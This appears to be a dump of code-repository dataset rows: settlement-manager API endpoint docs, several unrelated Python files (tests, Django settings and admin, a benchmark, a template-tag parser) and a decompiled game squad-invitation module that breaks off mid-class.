"name": "/settlement/add_innovation/<settlement_id>",
"subsection": "settlement_manage_innovations",
"desc": """\
<p> <b>POST</b> an Innovation <code>handle</code> to this route to add
it to the settlement's Innovations:</p>
<code>{'handle': 'hovel'}</code>
<p>...or:</p><code>{'handle': 'mastery_club'}</code>
<p><b>Important!</b> As far as the API is concerned, Principles (e.g.
'Graves', 'Survival of the Fittest', etc.) <u>are not innovations</u>
and you <u>will</u> break the website if you try to add a principle
as if it were an innovation.</p>
<p>Use <code>set_principle</code> (below) instead.</p>
""",
},
"settlement_rm_innovation_settlement_id": {
"name": "/settlement/rm_innovation/<settlement_id>",
"subsection": "settlement_manage_innovations",
"desc": """\
<p>This is basically the reverse of <code>add_innovation</code>
and works nearly identically. <b>POST</b> a JSON representation of an
Innovation handle to remove it from the settlement's list:</p>
<code>{'handle': 'mastery_club'}</code>
""",
},
"settlement_set_innovation_level_settlement_id": {
"name": "/settlement/set_innovation_level/<settlement_id>",
"subsection": "settlement_manage_innovations",
"desc": """\
<p>For Innovations that have a level (e.g. the Slenderman's 'Dark
Water Research'), you may set the Innovation's level by posting
the <code>handle</code> of the innovation and the level:</p>
<code>{'handle': 'dark_water_research', 'level': 2}</code>
""",
},
#
# timeline!
#
"settlement_get_timeline_settlement_id": {
"name": "/settlement/get_timeline/<settlement_id>",
"subsection": "settlement_manage_timeline",
"methods": ['GET'],
"desc": """\
<p>Hit this endpoint to get a JSON representation of the
settlement's timeline.</p>
<p>This is read-only and optimized for performance, so you'll
get a timeline MUCH faster using this route than one of the
routes that pulls down the whole settlement.</p>
""",
},
"settlement_add_lantern_years_settlement_id": {
"name": "/settlement/add_lantern_years/<settlement_id>",
"subsection": "settlement_manage_timeline",
"desc": """\
<p><b>POST</b> a number (int) of years to add to the settlement's
Timeline:</p>
<code>{years: 5}</code>
<p><b>NB:</b> Timelines are capped at 50 LYs. If you try to add
a number of years that would take you above 50 LYs, you'll get a
400 back.</p>
""",
},
"settlement_replace_lantern_year_settlement_id": {
"name": "/settlement/replace_lantern_year/<settlement_id>",
"subsection": "settlement_manage_timeline",
"desc": """\
<p>This is the preferred route for adding or removing events
from a Lantern year. It basically requires <b>POST</b>ing an
entire Lantern Year to the API, so be sure to understand the
<a href="#timelineDataModel">timeline data model</a> before
attempting to use this one.</p>
<p>Since a Lantern year is a hash of hashes, replacing one is
as simple as <b>POST</b>ing that hash to this route. To "blank
out" or remove all events from an LY, for example, you would
simply send a <b>POST</b> body like this:</p>
<code>{ly: {year: 5}}</code>
<p>Similarly, to add events to that LY, you could <b>POST</b>
something like this:</p>
<code>{ly: {year: 5, settlement_event: [{handle: 'core_open_maw'}, {handle: 'core_clinging_mist'}]}}</code>
<p>Finally, as the name suggests, this is an overwrite/replace
type method, and it does not do any "checks" or comparisons
between the data in the API and your incoming LY.</p>
<p>The best practice here, from a design standpoint, is to pull
down the settlement's timeline (e.g. using <code>get_timeline</code>
(above), let the user modify an individual LY as necessary, and
then to <b>POST</b> their modified LY back, in its entirety, to
this endpoint.</p>
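<p>That best-practice loop, sketched in Python (base URL, auth header
and the exact timeline shape are assumptions here):</p>
<pre><code>import requests

API = "https://api.example.com"  # hypothetical deployment root

def add_event_to_ly(settlement_id, year, event_handle, token):
    headers = {"Authorization": token}
    timeline = requests.get(
        API + "/settlement/get_timeline/" + settlement_id, headers=headers
    ).json()
    # assumes the timeline comes back as a list of LY hashes keyed by 'year'
    ly = next(y for y in timeline if y.get("year") == year)
    ly.setdefault("settlement_event", []).append({"handle": event_handle})
    # POST the whole modified LY back; this overwrites the stored LY
    return requests.post(
        API + "/settlement/replace_lantern_year/" + settlement_id,
        headers=headers,
        json={"ly": ly},
    )</code></pre>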
""",
},
"settlement_set_current_lantern_year_settlement_id": {
"name": "/settlement/set_current_lantern_year/<settlement_id>",
"subsection": "settlement_manage_timeline",
"desc": """\
<p>To set the settlement's current LY, <b>POST</b> an int to this
endpoint:</p>
<code>{ly: 3}</code>
""",
},
#
# settlement admins
#
"settlement_add_admin_settlement_id": {
"name": "/settlement/add_admin/<settlement_id>",
"subsection": "settlement_admin_permissions",
"methods": ["POST","OPTIONS"],
"desc": """\
<p><b>POST</b> the email address of a registered user to add them to the
list of settlement administrators:</p>
<code>{login: '[email protected]'}</code>
<p>Disclaimers:<ul><li>This will fail gracefully if the user's
email is already in the list (so feel free to spam it).</li><li>This will
fail loudly if the email address does not belong to a registered
user: you'll get a 400 and a nasty message back.</li></ul>
</p>
""",
},
"settlement_rm_admin_settlement_id": {
"name": "/settlement/rm_admin/<settlement_id>",
"subsection": "settlement_admin_permissions",
"methods": ["POST","OPTIONS"],
"desc": """\
<p>This is the reverse of the <code>add_admin</code> route.</p>
<p>Basically, you <b>POST</b> some JSON to the route including the email
of the user you want to remove from the settlement admins list:</p>
<code>{login: '[email protected]'}</code>
<p>Like the <code>add_admin</code> route, this one fails gracefully
if you try to remove someone who isn't on the list, etc.</p>
""",
},
#
# settlement notes
#
"settlement_add_note_settlement_id": {
"name": "/settlement/add_note/<settlement_id>",
"subsection": "settlement_notes_management",
"methods": ["POST","OPTIONS"],
"desc": """\
<p>Since any player in a game is allowed to create settlement
notes, the JSON required by this endpoint must include a user's
OID.</p>
<p>This endpoint supports the following key/value pairs:</p>
<table class="embedded_table">
<tr><th>key</th><th><b>R</b>/O</th><th>value</th></tr>
<tr>
<td class="small_key">author_id</td>
<td class="type"><b>R</b></type>
<td class="value">The creator's OID as a string.</td>
</tr>
<tr>
<td class="small_key">note</td>
<td class="type"><b>R</b></type>
<td class="value">The note as a string. We accept HTML here, so if you want to display this back to your users as HTML, you can do that.</td>
</tr>
<tr>
<td class="small_key">author</td>
<td class="type">O</type>
<td class="value">The creator's login, e.g. <code>[email protected]</code>, as a string. Best practice is to NOT include this, unless you really know what you're doing.</td>
</tr>
<tr>
<td class="small_key">lantern_year</td>
<td class="type">O</type>
<td class="value">The Lantern Year the note was created. Defaults to the current LY if not specified.</td>
</tr>
</table>
<p>For example, to add a new note to a settlement, your <b>POST</b>
body will, at a minimum, look something like this:</p>
<code>{author_id: "5a26eb1a4af5ca786d1ed548", note: "Nobody expects the Spanish Inquisition!"}</code>
<p><b>Important!</b> This route returns the OID of the
newly-created note:</p>
<code>{"note_oid": {"$oid": "5a2812d94af5ca03ef7db6c6"}}</code>
<p>...which can then be used to remove the note, if necessary
(see <code>rm_note</code> below).</p>
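<p>A create-then-remove round trip, sketched in Python (URL shape and
auth header assumed, as above):</p>
<pre><code>import requests

API = "https://api.example.com"  # hypothetical deployment root

def note_round_trip(settlement_id, author_oid, token):
    headers = {"Authorization": token}
    created = requests.post(
        API + "/settlement/add_note/" + settlement_id,
        headers=headers,
        json={"author_id": author_oid, "note": "Nobody expects it!"},
    ).json()
    note_oid = created["note_oid"]["$oid"]  # OID of the newly-created note
    # ...and later, remove that same note:
    return requests.post(
        API + "/settlement/rm_note/" + settlement_id,
        headers=headers,
        json={"_id": note_oid},
    )</code></pre>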
""",
},
"settlement_rm_note_settlement_id": {
"name": "/settlement/rm_note/<settlement_id>",
"subsection": "settlement_notes_management",
"methods": ["POST","OPTIONS"],
"desc": """\
<p><b>POST</b> the OID of a settlement note to remove it.</p>
<code>{_id: "5a26eb894af5ca786d1ed558"}</code>
<p>As long as you get a 200 back from this one, the note has
been removed. If you get a non-200 status (literally anything other
than a 200), something went wrong. </p>
""",
},
}
| [
"[email protected]"
]
| |
77936d27233ecb6692cf71a0edc03f93a9bed8ae | 50dd2a43daa8316fc11e0c176b5872738fcc5dde | /Learning/130_Fluent_Python/fp2-utf8/bloccode/example 13-14.py | 98a7540674b5e587a7df1e47f5cf78c41d0e53e3 | []
| no_license | FrenchBear/Python | 58204d368e3e72071eef298ff00d06ff51bd7914 | b41ab4b6a59ee9e145ef2cd887a5fe306973962b | refs/heads/master | 2023-08-31T18:43:37.792427 | 2023-08-26T15:53:20 | 2023-08-26T15:53:20 | 124,466,047 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 261 | py | # Example 13-14. typing.SupportsComplex protocol source code
@runtime_checkable
class SupportsComplex(Protocol):
"""An ABC with one abstract method __complex__."""
__slots__ = ()
@abstractmethod
def __complex__(self) -> complex:
pass
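

# Quick check (not part of the book listing): because the protocol is
# @runtime_checkable, isinstance() works against any object that
# implements __complex__, including the built-in complex type.
if __name__ == "__main__":
    assert isinstance(3 + 4j, SupportsComplex)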
| [
"[email protected]"
]
| |
c3130eff5ead53a74d10c68261d2e3559dfc4623 | 91ab6e48d02822bd957e210484fceff4ce0b7d61 | /usim_pytest/test_usimpy/utility.py | 07f6c368aa6577c5ef2802885d34f46f00ad824f | [
"MIT"
]
| permissive | MaineKuehn/usim | d203c78f2f644f546b932d1da40b50f26403d053 | 28615825fbe23140bbf9efe63fb18410f9453441 | refs/heads/master | 2021-09-25T08:05:03.015523 | 2021-09-17T13:42:39 | 2021-09-17T13:42:39 | 177,617,781 | 18 | 3 | MIT | 2021-09-17T13:42:40 | 2019-03-25T15:50:34 | Python | UTF-8 | Python | false | false | 1,097 | py | from functools import wraps
from typing import Callable, Generator
from ..utility import UnfinishedTest
def via_usimpy(test_case: Callable[..., Generator]):
"""
Mark a generator function test case to be run via a ``usim.py.Environment``
.. code:: python3
@via_usimpy
def test_sleep(env):
before = env.now
yield env.timeout(20)
after = env.now
assert after - before == 20
Note that ``env`` is passed in as a keyword argument.
"""
@wraps(test_case)
def run_test(self=None, env=None, **kwargs):
test_completed = False
if self is not None:
kwargs['self'] = self
def complete_test_case():
__tracebackhide__ = True
nonlocal test_completed
yield from test_case(env=env, **kwargs)
test_completed = True
__tracebackhide__ = True
env.process(complete_test_case())
result = env.run()
if not test_completed:
raise UnfinishedTest(test_case)
return result
return run_test
| [
"[email protected]"
]
| |
352e1986d5a4bcac3ff903fd27c91bb9134f049b | a904e99110721719d9ca493fdb91679d09577b8d | /month04/project/day01-note/django-redis-4.10.0/tests/test_sqlite_herd.py | 8a053dfdee6155fadba6c8df1a27d172aada7270 | [
"Apache-2.0",
"BSD-3-Clause"
]
| permissive | chaofan-zheng/tedu-python-demo | 7c7c64a355e5380d1f8b6464affeddfde0d27be7 | abe983ddc52690f4726cf42cc6390cba815026d8 | refs/heads/main | 2023-03-12T05:17:34.596664 | 2021-02-27T08:33:31 | 2021-02-27T08:33:31 | 323,350,480 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,113 | py | SECRET_KEY = "django_tests_secret_key"
CACHES = {
'default': {
'BACKEND': 'django_redis.cache.RedisCache',
'LOCATION': [
'127.0.0.1:6379:5',
],
'OPTIONS': {
'CLIENT_CLASS': 'django_redis.client.HerdClient',
}
},
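    # The alias below presumably points at an unused port (56379) on purpose,
    # so the suite can exercise connection-failure handling.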
"doesnotexist": {
"BACKEND": "django_redis.cache.RedisCache",
"LOCATION": "redis://127.0.0.1:56379?db=1",
"OPTIONS": {
"CLIENT_CLASS": "django_redis.client.HerdClient",
}
},
'sample': {
'BACKEND': 'django_redis.cache.RedisCache',
'LOCATION': '127.0.0.1:6379:1,127.0.0.1:6379:1',
'OPTIONS': {
'CLIENT_CLASS': 'django_redis.client.HerdClient',
}
},
"with_prefix": {
"BACKEND": "django_redis.cache.RedisCache",
"LOCATION": "redis://127.0.0.1:6379?db=1",
"OPTIONS": {
"CLIENT_CLASS": "django_redis.client.HerdClient",
},
"KEY_PREFIX": "test-prefix",
},
}
# TEST_RUNNER = 'django.test.simple.DjangoTestSuiteRunner'
INSTALLED_APPS = (
"django.contrib.sessions",
)
| [
"[email protected]"
]
| |
c6a4f7fd762b8c458facb55f5b26d1bc13b3c944 | e16d7d8f60145c68640b25aa7c259618be60d855 | /django_by_example/myshop/orders/admin.py | f09d215605498c4504e1c955a53d7fe07aa330af | []
| no_license | zongqiqi/mypython | bbe212223002dabef773ee0dbeafbad5986b4639 | b80f3ce6c30a0677869a7b49421a757c16035178 | refs/heads/master | 2020-04-21T07:39:59.594233 | 2017-12-11T00:54:44 | 2017-12-11T00:54:44 | 98,426,286 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 609 | py | from django.contrib import admin
from .models import Order,OrderItem
class OrderItemInline(admin.TabularInline):
model = OrderItem
raw_id_fields = ['product']
class OrderAdmin(admin.ModelAdmin):
list_display = ['id', 'first_name', 'last_name', 'email','address', 'postal_code', 'city', 'paid','created', 'updated']
list_filter = ['paid', 'created', 'updated']
inlines = [OrderItemInline]#使用OrderItemline来把OrderItem引用为OrderAdmin类的内联类
#内联类允许你在同一个编辑页面引用模型,并且将这个模型作为父模型
admin.site.register(Order, OrderAdmin) | [
"[email protected]"
]
| |
863e45c0783451eb725d9e5182ae2b3154aabdaf | c2634ebec1d4448e372d174f459c3cbc03fd1edc | /lib/node_modules/@stdlib/math/base/special/cosm1/benchmark/python/scipy/benchmark.py | 0f15a4ea4a9a905870399f1ccf3964f8e9ad5d86 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference",
"MIT",
"SunPro",
"BSD-3-Clause",
"BSL-1.0",
"LicenseRef-scancode-public-domain"
]
| permissive | stdlib-js/stdlib | ede11aee78f08e4f78a0bb939cb0bc244850b55b | f10c6e7db1a2b15cdd2b6237dd0927466ebd7278 | refs/heads/develop | 2023-09-05T03:29:36.368208 | 2023-09-03T22:42:11 | 2023-09-03T22:42:11 | 54,614,238 | 4,163 | 230 | Apache-2.0 | 2023-09-13T21:26:07 | 2016-03-24T04:19:52 | JavaScript | UTF-8 | Python | false | false | 2,198 | py | #!/usr/bin/env python
#
# @license Apache-2.0
#
# Copyright (c) 2018 The Stdlib Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Benchmark scipy.special.cosm1."""
from __future__ import print_function
import timeit
NAME = "cosm1"
REPEATS = 3
ITERATIONS = 1000000
def print_version():
"""Print the TAP version."""
print("TAP version 13")
def print_summary(total, passing):
"""Print the benchmark summary.
# Arguments
* `total`: total number of tests
* `passing`: number of passing tests
"""
print("#")
print("1.." + str(total)) # TAP plan
print("# total " + str(total))
print("# pass " + str(passing))
print("#")
print("# ok")
def print_results(elapsed):
"""Print benchmark results.
# Arguments
* `elapsed`: elapsed time (in seconds)
# Examples
``` python
python> print_results(0.131009101868)
```
"""
rate = ITERATIONS / elapsed
print(" ---")
print(" iterations: " + str(ITERATIONS))
print(" elapsed: " + str(elapsed))
print(" rate: " + str(rate))
print(" ...")
def benchmark():
"""Run the benchmark and print benchmark results."""
setup = "from scipy.special import cosm1; from random import random;"
stmt = "y = cosm1(4.0*random() - 2.0)"
t = timeit.Timer(stmt, setup=setup)
print_version()
for i in range(REPEATS):
print("# python::scipy::" + NAME)
elapsed = t.timeit(number=ITERATIONS)
print_results(elapsed)
print("ok " + str(i+1) + " benchmark finished")
print_summary(REPEATS, REPEATS)
def main():
"""Run the benchmark."""
benchmark()
if __name__ == "__main__":
main()
| [
"[email protected]"
]
| |
d7b781bab6353a104d0b726b33244a8255434f2b | d47cd584579452a8212a19ffee462f0c2e792a9c | /fluent_contents/utils/tagparsing.py | 0267274366501f593eb3eb2a955f356a98482d1c | [
"Apache-2.0"
]
| permissive | kerin/django-fluent-contents | 9db6d397c3b5aeebc4691e3b8ad6f09fbbd50c41 | d760e7d1648f4583bdd8ba4c3078a3f5d9f544b4 | refs/heads/master | 2021-01-15T17:55:28.346869 | 2013-02-11T14:26:04 | 2013-02-11T14:26:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,421 | py | from django.template.base import TemplateSyntaxError, Token
import re
kwarg_re = re.compile(r'^(?P<name>\w+)=')
def parse_token_kwargs(parser, token, compile_args=False, compile_kwargs=False, allowed_kwargs=None):
"""
Allow the template tag arguments to be like a normal Python function, with *args and **kwargs.
"""
if isinstance(token, Token):
bits = token.split_contents()
else:
bits = token
expect_kwarg = False
args = []
kwargs = {}
prev_bit = None
for bit in bits[1::]:
match = kwarg_re.match(bit)
if match:
expect_kwarg = True
            (name, expr) = bit.split('=', 1)  # only split on the first '=' so the value may itself contain '='
            kwargs[name] = parser.compile_filter(expr) if compile_kwargs else expr
else:
if expect_kwarg:
raise TemplateSyntaxError("{0} tag may not have a non-keyword argument ({1}) after a keyword argument ({2}).".format(bits[0], bit, prev_bit))
            args.append(parser.compile_filter(bit) if compile_args else bit)
prev_bit = bit
# Validate the allowed arguments, to make things easier for template developers
if allowed_kwargs is not None:
for name in kwargs:
if name not in allowed_kwargs:
raise AttributeError("The option %s=... cannot be used in '%s'.\nPossible options are: %s." % (name, bits[0], ", ".join(allowed_kwargs)))
return args, kwargs
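
# Usage sketch (hypothetical tag, not part of this module): inside a
# template tag's compile function you would typically call:
#
#     @register.tag
#     def my_tag(parser, token):
#         args, kwargs = parse_token_kwargs(
#             parser, token,
#             compile_args=True, compile_kwargs=True,
#             allowed_kwargs=('template', 'max_items'),
#         )
#         ...
#
# which parses a tag written as {% my_tag "arg1" template="foo.html" max_items=5 %}.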
| [
"[email protected]"
]
| |
169eefc9524590604288b8376f8c1f4d487c5c88 | fa78cd539cade5bba07e393c8d1184be58a6477a | /waste_collection/admin.py | a67fc1b7b28aa161d2dfddec85b68688bc9f5d76 | []
| no_license | iLabs-Makerere-University/tilenga-crm-django | e2c3e8777f012052a8cd77af5e06b9ae2180f805 | f764153e9c5877e20be1a1c1459de9fcb2b9df07 | refs/heads/master | 2020-04-29T22:08:04.113720 | 2019-04-01T08:18:15 | 2019-04-01T08:18:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 223 | py | from django.contrib import admin
from . models import WasteManagementProcedure
class WasteManagementProcedureAdmin(admin.ModelAdmin):
pass
admin.site.register(WasteManagementProcedure, WasteManagementProcedureAdmin)
| [
"[email protected]"
]
| |
601dc711804496f547111d1d953946085dd3b498 | e07da133c4efa517e716af2bdf67a46f88a65b42 | /hub20/apps/ethereum_money/management/commands/load_tracked_tokens.py | 5701e391f3f536030bd13c896353e2c518edd93a | [
"MIT"
]
| permissive | cryptobuks1/hub20 | be1da5f77a884f70068fd41edaa45d5e65b7c35e | 3a4d9cf16ed9d91495ac1a28c464ffb05e9f837b | refs/heads/master | 2022-04-19T21:26:15.386567 | 2020-04-19T07:17:47 | 2020-04-19T07:17:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 892 | py | import logging
from django.core.management.base import BaseCommand
from eth_utils import to_checksum_address
from hub20.apps.ethereum_money.app_settings import TRACKED_TOKENS
from hub20.apps.ethereum_money.models import EthereumToken
logger = logging.getLogger(__name__)
class Command(BaseCommand):
help = "Loads data relevant to all tokens that are going to be used by the instance"
def handle(self, *args, **options):
for token_address in TRACKED_TOKENS:
logger.info(f"Checking token {token_address}...")
try:
EthereumToken.make(to_checksum_address(token_address))
except OverflowError:
logger.error(f"{token_address} is not a valid address or not ERC20-compliant")
except Exception as exc:
logger.exception(f"Failed to load token data for {token_address}", exc_info=exc)
| [
"[email protected]"
]
| |
6ef6540bd2180186c923cbd1e76bfd2414db3f1d | ec6b94f8fa4558f2156f5cdf1ab0347fb5573241 | /tests/clickhouse/query_dsl/test_project_id.py | ce274c9a8930b4499e68fc3e9dba3946378cca79 | [
"Apache-2.0",
"BUSL-1.1"
]
| permissive | pombredanne/snuba | 8e9a55bf38b3ac84407d0c2755e3c0ac226688de | eb1d25bc52320bf57a40fd6efc3da3dd5e9f1612 | refs/heads/master | 2021-08-27T20:55:46.392979 | 2021-08-14T08:21:47 | 2021-08-14T08:21:47 | 171,631,594 | 0 | 0 | Apache-2.0 | 2020-01-10T10:42:17 | 2019-02-20T08:26:17 | Python | UTF-8 | Python | false | false | 4,583 | py | from typing import Any, MutableMapping, Set
import pytest
from snuba.clickhouse.query_dsl.accessors import get_object_ids_in_query_ast
from snuba.datasets.factory import get_dataset
from snuba.datasets.plans.translator.query import identity_translate
from snuba.query.parser import parse_query
test_cases = [
(
{"selected_columns": ["column1"], "conditions": [["project_id", "=", 100]]},
{100},
), # Simple single project condition
(
{
"selected_columns": ["column1"],
"conditions": [["project_id", "IN", [100, 200, 300]]],
},
{100, 200, 300},
), # Multiple projects in the query
(
{
"selected_columns": ["column1"],
"conditions": [["project_id", "IN", (100, 200, 300)]],
},
{100, 200, 300},
), # Multiple projects in the query provided as tuple
(
{"selected_columns": ["column1"], "conditions": []},
None,
), # No project condition
(
{
"selected_columns": ["column1"],
"conditions": [
["project_id", "IN", [100, 200, 300]],
["project_id", "IN", [300, 400, 500]],
],
},
{300},
), # Multiple project conditions, intersected together
(
{
"selected_columns": ["column1"],
"conditions": [
[
["project_id", "IN", [100, 200, 300]],
["project_id", "IN", [300, 400, 500]],
]
],
},
{100, 200, 300, 400, 500},
), # Multiple project conditions, in union
(
{
"selected_columns": ["column1"],
"conditions": [
["project_id", "IN", [100, 200, 300]],
["project_id", "=", 400],
],
},
set(),
), # A fairly stupid query
(
{
"selected_columns": ["column1"],
"conditions": [
["column1", "=", "something"],
[["ifNull", ["column2", 0]], "=", 1],
["project_id", "IN", [100, 200, 300]],
[("count", ["column3"]), "=", 10],
["project_id", "=", 100],
],
},
{100},
), # Multiple conditions in AND. Two project conditions
(
{
"selected_columns": ["column1"],
"conditions": [
["project_id", "IN", [100, 200, 300]],
[["project_id", "=", 100], ["project_id", "=", 200]],
],
},
{100, 200},
), # Main project list in a conditions and multiple project conditions in OR
(
{
"selected_columns": ["column1"],
"conditions": [
["project_id", "IN", [100, 200, 300]],
[
[["ifNull", ["project_id", 1000]], "=", 100],
[("count", ["column3"]), "=", 10],
[["ifNull", ["project_id", 1000]], "=", 200],
],
],
},
{100, 200, 300},
), # Main project list in a conditions and multiple project conditions within unsupported function calls
(
{
"selected_columns": ["column1"],
"conditions": [
[
[
"and",
[
["equals", ["project_id", 100]],
["equals", ["column1", "'something'"]],
],
],
"=",
1,
],
[
[
"and",
[
["equals", ["project_id", 200]],
["equals", ["column3", "'something_else'"]],
],
],
"=",
1,
],
],
},
None,
), # project_id in unsupported functions (cannot navigate into an "and" function)
# TODO: make this work as it should through the AST.
]
@pytest.mark.parametrize("query_body, expected_projects", test_cases)
def test_find_projects(
query_body: MutableMapping[str, Any], expected_projects: Set[int]
) -> None:
events = get_dataset("events")
query = identity_translate(parse_query(query_body, events))
project_ids_ast = get_object_ids_in_query_ast(query, "project_id")
assert project_ids_ast == expected_projects
| [
"[email protected]"
]
| |
4df8edf8fd0b18807fd1e09544c4b2f48e36594d | ec0b8bfe19b03e9c3bb13d9cfa9bd328fb9ca3f1 | /res/packages/scripts/scripts/client/gui/battle_control/arena_info/invitations.py | b1b060087fc9dc86befe5e49b3490250cc218ed0 | []
| no_license | webiumsk/WOT-0.9.20.0 | de3d7441c5d442f085c47a89fa58a83f1cd783f2 | 811cb4e1bca271372a1d837a268b6e0e915368bc | refs/heads/master | 2021-01-20T22:11:45.505844 | 2017-08-29T20:11:38 | 2017-08-29T20:11:38 | 101,803,045 | 0 | 1 | null | null | null | null | WINDOWS-1250 | Python | false | false | 10,226 | py | # 2017.08.29 21:44:26 Střední Evropa (letní čas)
# Embedded file name: scripts/client/gui/battle_control/arena_info/invitations.py
import BattleReplay
from adisp import process
from constants import PREBATTLE_TYPE, INVITATION_TYPE
from gui.battle_control.arena_info.settings import INVITATION_DELIVERY_STATUS
from gui.battle_control.requests.context import SendInvitesCtx
from gui.prb_control import prbInvitesProperty
from ids_generators import SequenceIDGenerator
from skeletons.gui.battle_session import ISquadInvitationsHandler
from unit_roster_config import SquadRoster
_STATUS = INVITATION_DELIVERY_STATUS
_SEND_ACTION_NAME = 'DynSquad.SendInvitationToSquad'
_ACCEPT_ACTION_NAME = 'DynSquad.AcceptInvitationToSquad'
_REJECT_ACTION_NAME = 'DynSquad.RejectInvitationToSquad'
class SquadInvitationsFilter(object):
__slots__ = ('__arenaUniqueID', '__isReceivingProhibited', '__isSendingProhibited', '__received', '__sent')
def __init__(self):
super(SquadInvitationsFilter, self).__init__()
self.__arenaUniqueID = 0
self.__isReceivingProhibited = False
self.__isSendingProhibited = False
self.__received = {}
self.__sent = {}
def setArenaUniqueID(self, arenaUniqueID):
self.__arenaUniqueID = arenaUniqueID
def isReceivingProhibited(self):
return self.__isReceivingProhibited
def isSendingProhibited(self):
return self.__isSendingProhibited
def updatePersonalInfo(self, arenaDP):
vInfoVO = arenaDP.getVehicleInfo()
playerInfo = vInfoVO.player
self.__isReceivingProhibited = playerInfo.forbidInBattleInvitations
self.__isSendingProhibited = False
if vInfoVO.isInSquad():
if playerInfo.isPrebattleCreator:
count = arenaDP.getVehiclesCountInPrebattle(vInfoVO.team, vInfoVO.prebattleID)
self.__isSendingProhibited = count >= SquadRoster.MAX_SLOTS
else:
self.__isSendingProhibited = True
def addReceivedInvite(self, invite):
if invite is None:
return (0, _STATUS.NONE)
else:
self.__received[invite.creatorDBID] = invite.clientID
include = _STATUS.RECEIVED_FROM
if not self.__isInviteValid(invite):
include |= _STATUS.RECEIVED_INACTIVE
return (invite.creatorDBID, include)
def addSentInvite(self, invite):
if invite is None:
return (0, _STATUS.NONE)
else:
self.__sent[invite.receiverDBID] = invite.clientID
include = _STATUS.SENT_TO
if not self.__isInviteValid(invite):
include |= _STATUS.SENT_INACTIVE
return (invite.receiverDBID, include)
def filterReceivedInvites(self, getter, added, changed, deleted):
"""Filters received invites.
        It's a generator that yields items of tuple(accountDBID, include, exclude).
:param getter: function to get invite data.
:param added: list of invites IDs that are added.
:param changed: list of invites IDs that are changed.
:param deleted: list of invites IDs that are deleted.
"""
for clientID in added:
invite = getter(clientID)
if invite is None:
continue
if not self.__isInviteValid(invite):
continue
self.__received[invite.creatorDBID] = invite.clientID
yield (invite.creatorDBID, _STATUS.RECEIVED_FROM, _STATUS.RECEIVED_INACTIVE)
for clientID in changed:
invite = getter(clientID)
if invite is None:
continue
if self.__isInviteValid(invite):
yield (invite.creatorDBID, _STATUS.RECEIVED_FROM, _STATUS.RECEIVED_INACTIVE)
else:
yield (invite.creatorDBID, _STATUS.RECEIVED_INACTIVE, _STATUS.NONE)
inverted = dict(zip(self.__received.values(), self.__received.keys()))
for clientID in deleted:
if clientID not in inverted:
continue
accountDBID = inverted[clientID]
if self.__received.pop(accountDBID, None) is not None:
yield (accountDBID, _STATUS.NONE, _STATUS.RECEIVED_FROM | _STATUS.RECEIVED_INACTIVE)
return
def filterSentInvites(self, getter, added, changed, deleted):
"""Filters sent invites.
        It's a generator that yields items of tuple(accountDBID, include, exclude).
:param getter: function to get invite data.
:param added: list of invites IDs that are added.
:param changed: list of invites IDs that are changed.
:param deleted: list of invites IDs that are deleted.
"""
for clientID in added:
invite = getter(clientID)
if invite is None:
continue
if not self.__isInviteValid(invite):
continue
self.__sent[invite.receiverDBID] = invite.clientID
yield (invite.receiverDBID, _STATUS.SENT_TO, _STATUS.SENT_INACTIVE)
for clientID in changed:
invite = getter(clientID)
if invite is None:
continue
if self.__isInviteValid(invite):
yield (invite.receiverDBID, _STATUS.SENT_TO, _STATUS.SENT_INACTIVE)
else:
yield (invite.receiverDBID, _STATUS.SENT_INACTIVE, _STATUS.NONE)
inverted = dict(zip(self.__sent.values(), self.__sent.keys()))
for clientID in deleted:
if clientID not in inverted:
continue
accountDBID = inverted[clientID]
if self.__sent.pop(accountDBID, None) is not None:
yield (accountDBID, _STATUS.NONE, _STATUS.SENT_TO | _STATUS.SENT_INACTIVE)
return
def __isInviteValid(self, invite):
if invite.type != PREBATTLE_TYPE.SQUAD:
return False
if not invite.isSameBattle(self.__arenaUniqueID):
return False
if not invite.isActive():
return False
return True
class _SquadInvitationsHandler(ISquadInvitationsHandler):
__slots__ = ('__sessionProvider',)
def __init__(self, setup):
super(_SquadInvitationsHandler, self).__init__()
self.__sessionProvider = setup.sessionProvider
@prbInvitesProperty
def prbInvites(self):
return None
def clear(self):
self.__sessionProvider = None
return
def send(self, playerID):
self.__onSendInviteToSquad(playerID)
def accept(self, playerID):
inviteID = self.__getInviteID(playerID, True, True)
if inviteID is not None:
self.prbInvites.acceptInvite(inviteID)
return
def reject(self, playerID):
inviteID = self.__getInviteID(playerID, True, True)
if inviteID is not None:
self.prbInvites.declineInvite(inviteID)
return
@process
def __onSendInviteToSquad(self, playerID):
yield self.__sessionProvider.sendRequest(SendInvitesCtx(databaseIDs=(playerID,)))
def __getInviteID(self, playerID, isCreator, incomingInvites):
invites = self.prbInvites.getInvites(incoming=incomingInvites, onlyActive=True)
if isCreator:
def getter(item):
return item.creatorDBID
else:
def getter(item):
return item.receiverDBID
for invite in invites:
if invite.type == INVITATION_TYPE.SQUAD and getter(invite) == playerID:
return invite.clientID
return None
class _SquadInvitationsRecorder(_SquadInvitationsHandler):
""" This class wraps _SquadInvitationsHandler in order to record player's
actions with dyn squads during replay recording."""
__slots__ = ('__idGen',)
def __init__(self, setup):
super(_SquadInvitationsRecorder, self).__init__(setup)
self.__idGen = SequenceIDGenerator()
def send(self, playerID):
BattleReplay.g_replayCtrl.serializeCallbackData(_SEND_ACTION_NAME, (self.__idGen.next(), playerID))
super(_SquadInvitationsRecorder, self).send(playerID)
def accept(self, playerID):
BattleReplay.g_replayCtrl.serializeCallbackData(_ACCEPT_ACTION_NAME, (self.__idGen.next(), playerID))
super(_SquadInvitationsRecorder, self).accept(playerID)
def reject(self, playerID):
BattleReplay.g_replayCtrl.serializeCallbackData(_REJECT_ACTION_NAME, (self.__idGen.next(), playerID))
super(_SquadInvitationsRecorder, self).reject(playerID)
class _SquadInvitationsPlayer(_SquadInvitationsHandler):
